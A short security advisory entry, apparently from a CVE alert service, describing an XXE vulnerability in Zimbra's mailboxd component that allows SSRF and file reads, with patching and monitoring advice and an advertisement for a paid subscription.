Zimbra XXE enabling SSRF and file read — exploited to steal admin credentials and access internal services. Apply Zimbra patches immediately. Disable XML external entity processing in Zimbra mailboxd. Monitor for unusual outbound HTTP from mail servers.
Synacor Zimbra Collaboration Suite before 8.7.12 has an XXE vulnerability in XML processing in the mailboxd component, which can be used to obtain SSRF and arbitrary file reads.
Supernova subscribers receive AI-triaged CVE alerts the moment they're published — before the PoC drops.
Start Supernova — $99/mo →